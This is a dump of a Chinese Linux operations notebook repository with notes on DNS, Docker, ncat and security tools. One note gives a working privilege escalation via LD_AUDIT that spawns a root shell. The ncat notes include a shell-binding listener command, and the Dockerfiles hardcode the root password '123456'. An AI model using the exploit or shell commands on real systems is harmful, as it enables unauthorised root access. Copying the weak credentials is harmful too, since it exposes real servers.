├── .gitignore
├── README.md
├── SUMMARY.md
├── an-quan.md
├── an-quan
├── kaligong-ju-ji-shi-yong-fen-lei.md
├── linuxxi-tong-ti-quan.md
├── linuxxi-tong-ti-quan
│ └── pu-tong-yong-hu-ti-quan.md
├── lou-dong-ping-gu.md
├── xin-xi-shou-ji.md
└── xin-xi-shou-ji
│ ├── nmap.md
│ └── nmap
│ ├── ncat.md
│ └── nping.md
├── assets
├── 1.png
├── 2.png
├── linux_tool.jpg
├── nginx.png
├── pssh-1.png
├── pssh-2.png
├── pssh-3.png
├── pssh-4.png
├── pssh-5.png
├── pssh-6.png
└── varnish.jpg
├── ce-shi.md
├── ce-shi
├── jmeter.md
├── pytest.md
├── pywinauto.md
└── selenium.md
├── chapter1.md
├── chapter1
├── dnsfu-wu-qi-bu-shu.md
├── dnsfu-wu-qi-bu-shu
│ ├── bind-bian-yi-an-zhuang.md
│ ├── bind-gu-zhang-chu-li.md
│ ├── bind-yum-an-zhuang.md
│ ├── dnsmasq-an-zhuang.md
│ └── ke-hu-duan-pei-zhi.md
├── docker.md
├── docker
│ ├── 13001-ji-chu-xue-xi.md
│ ├── 13001-ji-chu-xue-xi
│ │ ├── docker-si-you-jing-xiang-ku.md
│ │ ├── dockerfile-zhi-ling-xiang-jie.md
│ │ ├── nginx-dockerfile.md
│ │ └── php56-dockerfile.md
│ ├── 23001-tu-xing-hua-guan-li-gong-ju-ff08-san-jian-ke-ff09.md
│ ├── 23001-tu-xing-hua-guan-li-gong-ju-ff08-san-jian-ke-ff09
│ │ └── 1machine.md
│ └── compose.md
├── ftpfu-wu.md
├── ftpfu-wu
│ ├── proftp-fu-wu.md
│ ├── samba-fu-wu.md
│ └── vsftp-fu-wu.md
├── gitbookbu-shu.md
├── gitlabfu-wu-qi-bu-shu.md
├── gitlabfu-wu-qi-bu-shu
│ ├── git-fu-wu.md
│ ├── git-shi-yong-shou-ce.md
│ ├── git-tou-zhi-zhen-fen-li.md
│ ├── github-gao-ji-sou-suo.md
│ └── svn-fu-wu.md
├── jiu-3001-xu-ni-hua-fu-wu.md
├── kvmfu-wu-qi-bu-shu.md
├── liu-3001-nfs-fu-wu.md
├── liu-3001-nfs-fu-wu
│ ├── nfs-an-zhuang-bu-shu.md
│ ├── nfs-fsid-de-wen-ti.md
│ └── nfs-ke-hu-duan.md
├── lxc.md
├── ntpfu-wu-qi-bu-shu.md
├── ntpfu-wu-qi-bu-shu
│ ├── chrony.md
│ ├── ntp-client.md
│ ├── ntpd.md
│ └── shi-yong-an-li.md
├── openstack.md
├── ri-zhi-fu-wu-qi-eflk-bu-shu.md
├── ri-zhi-fu-wu-qi-eflk-bu-shu
│ ├── an-zhuang-grokbug-huan-jing.md
│ ├── an-zhuang-x-pack.md
│ ├── eflkbu-shu.md
│ ├── goaccess-ri-zhi-fen-xi.md
│ ├── logstash-pei-zhi.md
│ └── rsyslog-fu-wu.md
├── san-3001-ssh-fu-wu.md
├── san-3001-ssh-fu-wu
│ ├── pssh-shi-yong.md
│ ├── rsync-fu-wu.md
│ ├── ssh-agent-dai-li.md
│ ├── ssh-bao-po-gong-5177-hydra.md
│ ├── ssh-bao-po-gong-5177-medusa.md
│ ├── ssh-client-an-zhuang.md
│ ├── ssh-forward.md
│ ├── ssh-mount-shi-yong.md
│ ├── ssh-pass-shi-yong.md
│ └── ssh-serveran-zhuang.md
├── shi-3001-zi-dong-hua.md
├── shi-3001-zi-dong-hua
│ ├── ansible.md
│ ├── ansible
│ │ ├── 2ansibleji-ben-shi-yong.md
│ │ ├── 33001-chang-jian-mo-kuai.md
│ │ ├── 4playbook-yaml.md
│ │ ├── 5ansibleji-chu-yuan-su.md
│ │ ├── 6playbookde-zu-cheng-jie-gou.md
│ │ ├── ansible-windows.md
│ │ ├── ansiblean-zhuang.md
│ │ └── bao-cuo-xin-xi-chu-li.md
│ ├── fabric.md
│ ├── puppet.md
│ ├── puppet
│ │ ├── chang-yong-ming-ling-bang-zhu.md
│ │ ├── cuo-wu.md
│ │ ├── puppet-dashboardan-zhuang.md
│ │ ├── puppet-exceguan-li.md
│ │ ├── puppet-service-guan-li.md
│ │ ├── puppetan-zhuang.md
│ │ ├── puppetgao-ji-yong-fa-ff08-bian-cheng-yu-fa-ff09.md
│ │ ├── puppetgao-ji-yong-fa-ff08-lei-he-mo-kuai-ff09.md
│ │ ├── puppetren-wu-ji-hua-guan-li.md
│ │ ├── puppetruan-jian-bao-guan-li.md
│ │ ├── puppetwen-jian-guan-li.md
│ │ ├── puppetyong-hu-guan-li.md
│ │ ├── puppetzheng-shu-guan-li.md
│ │ └── puppetzi-dong-zhu-ce.md
│ ├── puppetan-zhuang.md
│ ├── saltstack.md
│ └── shell.md
├── shi-er-3001-qi-ta.md
├── shi-er-3001-qi-ta
│ ├── centos65-an-zhuang-python3-pip3.md
│ ├── centos7-grubxiu-fu.md
│ ├── centos7-xiu-gai-wang-qia-ming-wei-eth0.md
│ ├── jira.md
│ ├── linux-huan-ying-ye-9762-motd.md
│ ├── linux-ji-chu-xin-xi-pei-zhi.md
│ ├── linuxyi-jian-an-zhuang-guang-pan-zhi-zuo.md
│ ├── markdownyu-fa-shou-ce.md
│ ├── nali-shi-yong.md
│ ├── pxe-pi-liang-zhuang-ji-fu-wu.md
│ ├── ranger文件管理器.md
│ ├── redmin-fu-wu.md
│ ├── screen-qing-chu-yi-ge-detached-hui-hua.md
│ ├── ss-fan-qiang-fu-wu.md
│ ├── vim-cha-jian.md
│ ├── vim-cha-jian
│ │ └── vimrc.md
│ ├── wget-shi-yong.md
│ └── xfsci-pankuo-zhan-inode.md
├── shi-yi-3001-jian-kong.md
├── shi-yi-3001-jian-kong
│ ├── apm.md
│ ├── grafana.md
│ ├── jian-kong-ming-ling-ji-he.md
│ ├── jian-kong-ming-ling-ji-he
│ │ ├── iotop.md
│ │ ├── netstat.md
│ │ ├── nicstat.md
│ │ └── tcprstat.md
│ ├── pinggong-ju-ji-he.md
│ ├── pinggong-ju-ji-he
│ │ ├── 1ping.md
│ │ ├── 3httping.md
│ │ ├── 4tcping.md
│ │ ├── 4tcping
│ │ │ └── 5httping.md
│ │ ├── 5httping.md
│ │ ├── fping.md
│ │ └── hping.md
│ └── zabbix.md
├── vagrant.md
├── virtualbox.md
├── yumyuan-fu-wu-qi-bu-shu.md
└── yumyuan-fu-wu-qi-bu-shu
│ ├── bind-yum-an-zhuang.md
│ ├── fpm-zhi-zuo-rpm-bao.md
│ ├── nei-bu-yum-yuan-tong-bu-gong-wang-yuan.md
│ ├── zi-ding-yi-rpm-bao.md
│ └── zi-ding-yi-yum-yuan.md
├── fu-wu-bu-shu.md
├── fu-wu-bu-shu
├── da-shu-ju-fu-wu.md
├── fu-zai-jun-8861-gao-ke-yong-fu-wu.md
├── fu-zai-jun-8861-gao-ke-yong-fu-wu
│ ├── haproxy.md
│ ├── heartbeat.md
│ ├── heartbeat
│ │ ├── heartbeat-an-zhuang.md
│ │ └── heartbeat-centos7bian-yi-an-zhuang.md
│ ├── keepalive.md
│ ├── lvs.md
│ ├── lvs
│ │ ├── lvs-dr.md
│ │ └── lvs-nat.md
│ └── nginx.md
├── he-xin-gong-neng-fen-lei-pei-zhi.md
├── huan-cun-fu-wu.md
├── huan-cun-fu-wu
│ ├── ata.md
│ ├── nginx.md
│ ├── squid.md
│ └── varnish.md
├── mongo.md
├── mysql.md
├── mysql
│ └── mysqlman-cha-xun-fen-xi.md
├── nginx.md
├── nginx
│ ├── he-xin-pei-zhi-fen-lei.md
│ ├── kai-qi-nginx-zhuang-tai-ye-mian.md
│ ├── liu-lan-qi-bu-zi-dong-jie-xi-bo-fang-wen-jian.md
│ ├── nginx-dai-li-304-wen-ti.md
│ ├── nginx-dai-li-websocket.md
│ ├── nginx-fan-hui-json-shu-ju.md
│ ├── nginx-wen-jian-fang-dao-lian.md
│ ├── nginx-zi-fu-luan-ma-wen-ti.md
│ ├── nginxxia-zai-wen-jian-zhong-ming-ming.md
│ └── webpei-zhi-fen-lei.md
├── php.md
├── php
│ ├── php-huo-qu-tou-xin-xi.md
│ ├── phphuan-jing-an-quan-jia-gu.md
│ └── phppei-zhi-zhi-ding-cha-zhao-gong-xiang-ku-wen-jian-lu-jing.md
├── redis.md
├── redis
│ ├── 10rdbkuai-zhao-chi-jiu-hua.md
│ ├── 11aof.md
│ ├── 12rediszhu-cong-fu-zhi.md
│ ├── 13redisyun-wei-chang-yong-ming-ling.md
│ ├── 14sentinel-yun-wei-jian-kong-ff08-shao-bing-ff09.md
│ ├── 153001-an-li-ff08-wei-tu-fa-tong-ji-huo-yue-yong-hu-ff09.md
│ ├── 23001-tong-yong-key-ming-ling-cao-zuo.md
│ ├── 3stringjie-gou-ji-ming-ling.md
│ ├── 4linklian-biao-jie-gou.md
│ ├── 5set-ji-he-jie-gou.md
│ ├── 6order-setyou-xu-ji-he.md
│ ├── 73001-ha-xi-jie-gou.md
│ ├── 8redisshi-wu-ji-suo-ying-yong.md
│ ├── 9redispin-dao-fa-bu-yu-xiao-xi-ding-yue.md
│ ├── an-zhuang.md
│ ├── redis-shao-bing.md
│ └── redisqian-yi.md
├── shu-ju-ku-fu-wu.md
├── si-3001-memcache.md
├── tomcat.md
├── webfu-wu.md
├── webgong-neng-fen-lei-pei-zhi.md
├── wu-3001-ssdb.md
└── zhong-jian-jian-fu-wu.md
├── linuxgao-ji.md
├── linuxgao-ji
├── diao-you.md
├── er-3001-quan-xian-kong-zhi.md
├── er-3001-quan-xian-kong-zhi
│ ├── 1cpu.md
│ ├── 2mem.md
│ ├── 3io.md
│ ├── 43001-ce-lve-lu-you.md
│ ├── 53001-wang-qia-bang-ding.md
│ ├── ji-ben-quan-xian.md
│ ├── mountquan-xian.md
│ ├── pam.md
│ ├── selinux.md
│ └── sudoquan-xian.md
├── iptables-pei-zhi.md
├── shu-ju-an-quan.md
└── shu-ju-an-quan
│ ├── cuan-gai.md
│ ├── hidszhu-ji-xing-jian-ce-xi-7edf29.md
│ ├── qie-ting.md
│ ├── wei-zhuang.md
│ └── wu-li-zhong-duan.md
├── linuxji-chu.md
├── linuxji-chu
├── ba-3001-ren-wu-ji-hua-guan-li.md
├── er-3001-wen-jian-lei-xing-he-wen-jian-kuo-zhan-ming.md
├── etc-mu-lu-xia-wen-jian-gong-neng-jie-shao.md
├── liu-3001-jin-cheng-guan-li.md
├── proc.md
├── qi-3001-ruan-jian-guan-li.md
├── san-3001-yong-hu-he-yong-hu-zu.md
├── si-3001-ruan-lian-jie-he-ying-lian-jie.md
├── wu-3001-wen-jian-he-mu-lu-guan-li.md
└── yi-3001-linux-mu-lu-jie-gou.md
├── ntpfu-wu-qi.md
├── pa-chong.md
├── pa-chong
├── curl-gong-ju.md
├── httpbin-shi-yong.md
├── requests-mo-kuai-shi-yong.md
├── urllib-mo-kuai-shi-yong.md
└── wget-gong-ju.md
├── wang-luo.md
├── wang-luo
└── wang-luo-gu-zhang-ying-yong-fen-xi.md
├── ying-jian-xin-xi-xiang-guan.md
└── ying-jian-xin-xi-xiang-guan
├── 4e94-dell-linux-shou-ji-xin-606f28-dell-bao-969c29.md
├── er-3001-dell-fu-wu-qi-cuo-wu-dai-ma.md
├── liu-3001-cha-kan-linux-ben-ji-gong-wang-ip.md
├── san-3001-dell-megacli-ming-ling.md
├── si-3001-dell-racadm-ming-ling.md
├── wu-3001-hp-hpasmcli-ming-ling.md
└── yi-3001-dell-fu-wu-qi-chang-jian-wen-ti-ji-zhu-shou-ce.md
/.gitignore:
--------------------------------------------------------------------------------
1 | # Node rules:
2 | ## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
3 | .grunt
4 |
5 | ## Dependency directory
6 | ## Commenting this out is preferred by some people, see
7 | ## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git
8 | node_modules
9 |
10 | # Book build output
11 | _book
12 |
13 | # eBook build output
14 | *.epub
15 | *.mobi
16 | *.pdf
--------------------------------------------------------------------------------
/an-quan.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/an-quan.md
--------------------------------------------------------------------------------
/an-quan/kaligong-ju-ji-shi-yong-fen-lei.md:
--------------------------------------------------------------------------------
1 | * [信息收集](an-quan/xin-xi-shou-ji.md)
2 | * 漏洞评估
3 | * web应用
4 | * 密码攻击
5 | * 漏洞利用
6 | * 网络监听
7 | * 维护访问
8 | * 报告工具
9 | * 无线攻击
10 | * 逆向工程
11 | * 压力测试
--------------------------------------------------------------------------------
/an-quan/linuxxi-tong-ti-quan.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/an-quan/linuxxi-tong-ti-quan.md
--------------------------------------------------------------------------------
/an-quan/linuxxi-tong-ti-quan/pu-tong-yong-hu-ti-quan.md:
--------------------------------------------------------------------------------
1 | ###普通用户提权
2 |
3 | [test@ahu ~]$ mkdir /tmp/exploit
4 | [test@ahu ~]$ ln /bin/ping /tmp/exploit/target
5 | [test@ahu exploit]$ exec 3< /tmp/exploit/target
6 | [test@ahu exploit]$ ls -l /proc/$$/fd/3
7 | lr-x------ 1 test test 64 Aug 17 21:41 /proc/35612/fd/3 -> /tmp/exploit/target
8 | [test@ahu exploit]$ rm -rf /tmp/exploit/
9 | [test@ahu exploit]$ ls -l /proc/$$/fd/3
10 | [test@ahu ~]$ vim payload.c
11 | void __attribute__((constructor)) init() //在配置文件加入如下的内容
12 | {
13 | setuid(0);
14 | system("/bin/bash");
15 | }
16 |
17 | [test@ahu ~]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
18 | [test@ahu ~]$ ls -l /tmp/exploit
19 | [test@ahu ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
20 | Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
21 | [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
22 | [-M mtu discovery hint] [-S sndbuf]
23 | [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
24 | [root@ahu ~]# whoami
25 | root
26 |
27 |
--------------------------------------------------------------------------------
/an-quan/lou-dong-ping-gu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/an-quan/lou-dong-ping-gu.md
--------------------------------------------------------------------------------
/an-quan/xin-xi-shou-ji.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/an-quan/xin-xi-shou-ji.md
--------------------------------------------------------------------------------
/an-quan/xin-xi-shou-ji/nmap/ncat.md:
--------------------------------------------------------------------------------
1 | ### ncat 使用场景
2 | **1、简单传输数据**
3 |
4 | server:
5 | #ncat -v -lp 8000
6 | Ncat: Version 5.51 ( http://nmap.org/ncat )
7 | Ncat: Listening on 0.0.0.0:8000
8 |
9 |
10 |
11 | Ncat: Connection from 127.0.0.1:48960.
12 | hello
13 |
14 | client:
15 | # ncat localhost 8000
16 |
17 | hello
18 |
19 | 这时双方都可以发送消息
20 |
21 | **2、探测端口**
22 |
23 |
24 | # ncat localhost 80
25 | GET / HTTP/1.1
26 |
27 | HTTP/1.1 400 Bad Request
28 | Server: nginx/1.10.2
29 | Date: Wed, 27 Feb 2019 11:51:49 GMT
30 | Content-Type: text/html
31 | Content-Length: 173
32 | Connection: close
33 |
34 |
35 |
400 Bad Request
36 |
37 | 400 Bad Request
38 |
nginx/1.10.2
39 |
40 |
41 |
42 | # ncat localhost 22
43 | SSH-2.0-OpenSSH_5.3
44 |
45 | **3、文件传输**
46 |
47 | 接收方:
48 | ncat -v -lp 8000 > test
49 |
50 | 发送方:
51 | ncat localhost 8000 --send-only < test
52 |
53 | **4、目录传输**
54 |
55 | 发送方:
56 |
57 | 接收方:
58 |
59 |
60 | **5、压缩传输**
61 |
62 | **6、反弹shell**
63 |
64 | server:
65 | ncat -v -c "/bin/bash -i" -lp 8000
66 |
67 | client:
68 | ncat localhost 8000
69 | whoami
70 | root
71 |
72 | **7、代理**
73 |
74 | #单向没有输出值
75 | ncat -l 8000 | ncat www.baidu.com 80
76 |
77 | ncat localhost 8000
78 |
79 | #利用管道做代理
80 | server:
81 | mkfifo myfifo
82 | ncat -l 8000 myfifo
83 |
84 | client:
85 | ncat localhost 8000
86 | HTTP/1.1 400 Bad Request
87 |
88 |
89 |
90 |
91 |
92 |
93 |
--------------------------------------------------------------------------------
/an-quan/xin-xi-shou-ji/nmap/nping.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/an-quan/xin-xi-shou-ji/nmap/nping.md
--------------------------------------------------------------------------------
/assets/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/1.png
--------------------------------------------------------------------------------
/assets/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/2.png
--------------------------------------------------------------------------------
/assets/linux_tool.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/linux_tool.jpg
--------------------------------------------------------------------------------
/assets/nginx.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/nginx.png
--------------------------------------------------------------------------------
/assets/pssh-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/pssh-1.png
--------------------------------------------------------------------------------
/assets/pssh-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/pssh-2.png
--------------------------------------------------------------------------------
/assets/pssh-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/pssh-3.png
--------------------------------------------------------------------------------
/assets/pssh-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/pssh-4.png
--------------------------------------------------------------------------------
/assets/pssh-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/pssh-5.png
--------------------------------------------------------------------------------
/assets/pssh-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/pssh-6.png
--------------------------------------------------------------------------------
/assets/varnish.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/assets/varnish.jpg
--------------------------------------------------------------------------------
/ce-shi.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | * [pytest教程](ce-shi/pytest.md)
4 | * [selenium教程](ce-shi/selenium.md)
5 | * [jmeter教程](ce-shi/jmeter.md)
6 | * [pywinauto教程](ce-shi/pywinauto.md)
7 |
8 | | 工具 | 用途 | 备注 |
9 | | --------- | ------------------ | ---- |
10 | | pytest | 单元测试、接口测试 | |
11 | | selenium | 浏览器自动化测试 | |
12 | | jmeter | 性能测试 | |
13 | | pywinauto | PC自动化测试 | |
14 | | Appium | 移动端测试 | |
15 |
16 |
--------------------------------------------------------------------------------
/chapter1.md:
--------------------------------------------------------------------------------
1 | # 基础设施
2 |
3 | - **时间服务器**
4 | - **DNS服务器**
5 | - **文件服务器**
6 | - **备份服务器**
7 | - **日志服务器**
8 | - **监控服务器**
9 | - **集中验证服务器**
10 |
11 |
--------------------------------------------------------------------------------
/chapter1/dnsfu-wu-qi-bu-shu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/dnsfu-wu-qi-bu-shu.md
--------------------------------------------------------------------------------
/chapter1/dnsfu-wu-qi-bu-shu/bind-gu-zhang-chu-li.md:
--------------------------------------------------------------------------------
1 | **1、dns 区域文件乱码**
2 |
3 | zone "91.32.10.in-addr.arpa" IN {
4 | type slave;
5 | masters { XXX.XXX.XXX.XXX; };
6 | masterfile-format text;
7 | file "10.32.91.zone";
8 | };
9 |
10 | ###配置传送格式
11 | masterfile-format text;
12 |
13 |
--------------------------------------------------------------------------------
/chapter1/dnsfu-wu-qi-bu-shu/dnsmasq-an-zhuang.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/dnsfu-wu-qi-bu-shu/dnsmasq-an-zhuang.md
--------------------------------------------------------------------------------
/chapter1/docker.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/docker.md
--------------------------------------------------------------------------------
/chapter1/docker/13001-ji-chu-xue-xi/docker-si-you-jing-xiang-ku.md:
--------------------------------------------------------------------------------
1 | **1、安装镜像库**
2 |
3 | #下载镜像
4 | docker pull registry
5 | #创建映射数据目录
6 | mkdir -pv /opt/data/registry
7 |
8 | #启动是由镜像库
9 | docker run -d -p 5000:5000 -v /opt/data/registry/:/var/lib/registry --name docker-hub registry
10 |
11 | **2、镜像管理**
12 | - 推送
13 |
14 |
15 | #打tag
16 | docker tag centos:latest 127.0.0.1:5000/centos:latest
17 | #上传镜像
18 | docker push 127.0.0.1:5000/centos:latest
19 |
20 | - 下载
21 |
22 |
23 | #删除tag
24 | docker image rm 127.0.0.1:5000/ubuntu:latest
25 | #从镜像库下载镜像
26 | docker pull 127.0.0.1:5000/ubuntu:latest
27 | - 查看镜像
28 |
29 |
30 | curl 127.0.0.1:5000/v2/_catalog
31 |
32 | **3、指定docker 默认镜像源**
33 |
34 |
35 | vim /etc/docker/daemon.json
36 | {
37 | "registry-mirror": [
38 | "https://registry.docker-cn.com"
39 | ],
40 | "insecure-registries": [
41 | "127.0.0.1:5000"
42 | ]
43 | }
44 |
--------------------------------------------------------------------------------
/chapter1/docker/13001-ji-chu-xue-xi/dockerfile-zhi-ling-xiang-jie.md:
--------------------------------------------------------------------------------
1 |
2 | - FROM
3 |
4 |
5 | #指定基础镜像
6 | from centos
7 | - COPY
8 |
9 |
10 | #复制文件
11 | COPY demo.txt /tmp/
12 | - RUN
13 |
14 |
15 | #执行命令
16 | RUN ip ad li
17 | - ADD
18 |
19 |
20 | #复制文件(可以自动解压)
21 | ADD nginx.tar.gz /tmp
22 | - CMD
23 |
24 |
25 | #容器启动命令
26 | - shell
27 | CMD nc -l 80
28 | - exec #传递参数
29 | CMD ["demo.sh","ip","host"]
30 | - ENTRYPOINT
31 |
32 |
33 | #入口点
34 | - ENV
35 |
36 |
37 | #设置环境变量
38 | - ARG
39 |
40 |
41 | #构建参数
42 | - VOLUME
43 |
44 |
45 | #定义匿名卷
46 | - EXPOSE
47 |
48 |
49 | #暴露端口
50 | - WORKDIR
51 |
52 |
53 | #指定工作目录
54 | - USER
55 |
56 |
57 | #指定当前用户
58 | - HEALTHCHECK
59 |
60 |
61 | #健康检查
62 | - ONBUILD
63 |
64 |
65 | #略
--------------------------------------------------------------------------------
/chapter1/docker/13001-ji-chu-xue-xi/nginx-dockerfile.md:
--------------------------------------------------------------------------------
1 | **1、dockerfile**
2 | #基础镜像
3 | FROM centos
4 |
5 | #mail
6 | MAINTAINER zhouxulong
7 |
8 | #install soft
9 | RUN yum -y install epel-release
10 |
11 | RUN yum -y install net-tools iproute vim vi wget curl openssh-server supervisor
12 | RUN echo "123456" |passwd --stdin root
13 |
14 | # sshd 配置
15 | RUN mkdir -p /var/run/sshd
16 | RUN sed -i 's/UsePAM yes/UsePAM no/g' /etc/ssh/sshd_config
17 | RUN sed -i "s/#UsePrivilegeSeparation.*/UsePrivilegeSeparation no/g" /etc/ssh/sshd_config
18 | RUN ssh-keygen -q -t dsa -b 1024 -f /etc/ssh/ssh_host_dsa_key -N ''
19 | RUN ssh-keygen -q -t rsa -b 1024 -f /etc/ssh/ssh_host_rsa_key -N ''
20 | RUN ssh-keygen -q -t ecdsa -f /etc/ssh/ssh_host_ecdsa_key -N ''
21 | RUN ssh-keygen -q -t dsa -f /etc/ssh/ssh_host_ed25519_key -N ''
22 | COPY supervisord.conf /etc/supervisord.d/supervisord.conf
23 |
24 |
25 |
26 | #nginx 配置
27 | RUN yum -y install gcc gcc-c++ pecl pecl-devel openssl openssl-devel gzlib gzlib-devel
28 | RUN groupadd nginx -g 4000 && useradd -s /sbin/nologin -g nginx nginx -u 4000 -M
29 | COPY nginx-1.14.0.tar.gz /usr/local/src/nginx-1.14.0.tar.gz
30 | RUN cd /usr/local/src/ && tar xf nginx-1.14.0.tar.gz
31 | RUN cd /usr/local/src/nginx-1.14.0 && ./configure --prefix=/usr/local/nginx \
32 | --user=nginx --group=nginx \
33 | --with-http_ssl_module \
34 | --with-http_flv_module \
35 | --with-http_sub_module \
36 | --with-http_stub_status_module \
37 | --with-http_gzip_static_module \
38 | --http-fastcgi-temp-path=/usr/local/nginx/tmp/fcgi \
39 | --http-client-body-temp-path=/usr/local/nginx/tmp/client \
40 | --http-proxy-temp-path=/usr/local/nginx/tmp/proxy \
41 | --http-scgi-temp-path=/usr/local/nginx/tmp/scgi \
42 | --http-uwsgi-temp-path=/usr/local/nginx/tmp/uwsgi && make && make install
43 |
44 | RUN echo "daemon off;">>/usr/local/nginx/conf/nginx.conf
45 | RUN mkdir -pv /usr/local/nginx/tmp
46 |
47 |
48 | #docker 开启22端口
49 | EXPOSE 22
50 | EXPOSE 80
51 | EXPOSE 443
52 |
53 | #前台运行程序
54 | CMD ["/bin/bash","-c","/usr/bin/supervisord -c /etc/supervisord.d/supervisord.conf"]
55 |
56 | **2、supvervisord**
57 |
58 | [supervisord]
59 | nodaemon=true
60 |
61 | # 注意这里service.sh脚本不能使用后台启动(nohup或者&)
62 | [program:sshd]
63 | command=/usr/sbin/sshd -D
64 |
65 | [program:nginx]
66 | command=/usr/local/nginx/sbin/nginx
67 |
68 |
69 |
--------------------------------------------------------------------------------
/chapter1/docker/13001-ji-chu-xue-xi/php56-dockerfile.md:
--------------------------------------------------------------------------------
1 | **1、dockerfile**
2 | #基础镜像
3 | FROM centos
4 |
5 | #mail
6 | MAINTAINER zhouxulong
7 |
8 | #install soft
9 | RUN yum -y install epel-release
10 |
11 | RUN yum -y install net-tools iproute vim vi wget curl openssh-server supervisor
12 | RUN echo "123456" |passwd --stdin root
13 |
14 | # sshd 配置
15 | RUN mkdir -p /var/run/sshd
16 | RUN sed -i 's/UsePAM yes/UsePAM no/g' /etc/ssh/sshd_config
17 | RUN sed -i "s/#UsePrivilegeSeparation.*/UsePrivilegeSeparation no/g" /etc/ssh/sshd_config
18 | RUN ssh-keygen -q -t dsa -b 1024 -f /etc/ssh/ssh_host_dsa_key -N ''
19 | RUN ssh-keygen -q -t rsa -b 1024 -f /etc/ssh/ssh_host_rsa_key -N ''
20 | RUN ssh-keygen -q -t ecdsa -f /etc/ssh/ssh_host_ecdsa_key -N ''
21 | RUN ssh-keygen -q -t dsa -f /etc/ssh/ssh_host_ed25519_key -N ''
22 | COPY supervisord.conf /etc/supervisord.d/supervisord.conf
23 |
24 |
25 |
26 | #php 配置
27 | RUN yum -y install gcc gcc-c++ libxml2 libxml2-devel bzip2 bzip2-devel libmcrypt libmcrypt-devel openssl openssl-devel libcurl-devel libjpeg-devel libpng-devel freetype-devel readline readline-devel libxslt-devel perl perl-devel psmisc.x86_64 recode recode-devel libtidy libtidy-devel
28 | COPY php-5.6.23.tar.gz /usr/local/src/php-5.6.23.tar.gz
29 | RUN cd /usr/local/src && tar xf php-5.6.23.tar.gz
30 | WORKDIR /usr/local/src/php-5.6.23
31 | RUN ./configure --prefix=/usr/local/php5.6 --with-curl --with-freetype-dir --with-gd --with-gettext --with-iconv-dir --with-kerberos --with-libdir=lib64 --with-libxml-dir --with-mysqli --with-openssl --with-pcre-regex --with-pdo-mysql --with-pdo-sqlite --with-pear --with-png-dir --with-xmlrpc --with-xsl --with-zlib --enable-fpm --enable-bcmath --enable-libxml --enable-inline-optimization --enable-gd-native-ttf --enable-mbregex --enable-mbstring --enable-opcache --enable-pcntl --enable-shmop --enable-soap --enable-sockets --enable-sysvsem --enable-xml --enable-zip
32 |
33 | RUN make && make install
34 | RUN cp /usr/local/src/php-5.6.23/php.ini-production /usr/local/php5.6/lib/php.ini
35 | RUN cp /usr/local/src/php-5.6.23/sapi/fpm/init.d.php-fpm /etc/init.d/php-fpm
36 | RUN cp /usr/local/php5.6/etc/php-fpm.conf.default /usr/local/php5.6/etc/php-fpm.conf
37 |
38 |
39 | RUN groupadd php -g 3000 && useradd -s /sbin/nologin -g php php -u 3000 -M
40 | RUN sed -i -e 's@;pid = run/php-fpm.pid@pid = run/php-fpm.pid@g' -e 's@nobody@php@g' -e 's@listen = 127.0.0.1:9000@listen = 0.0.0.0:9000@g' /usr/local/php5.6/etc/php-fpm.conf
41 | RUN sed -i 's@;daemonize = yes@daemonize = no@g' /usr/local/php5.6/etc/php-fpm.conf
42 |
43 | #docker 开启22,9000端口
44 | EXPOSE 9000
45 | EXPOSE 22
46 |
47 | #前台运行程序
48 | CMD ["/bin/bash","-c","/usr/bin/supervisord -c /etc/supervisord.d/supervisord.conf"]
49 |
50 | 2、supervisord
51 |
52 | [supervisord]
53 | nodaemon=true
54 |
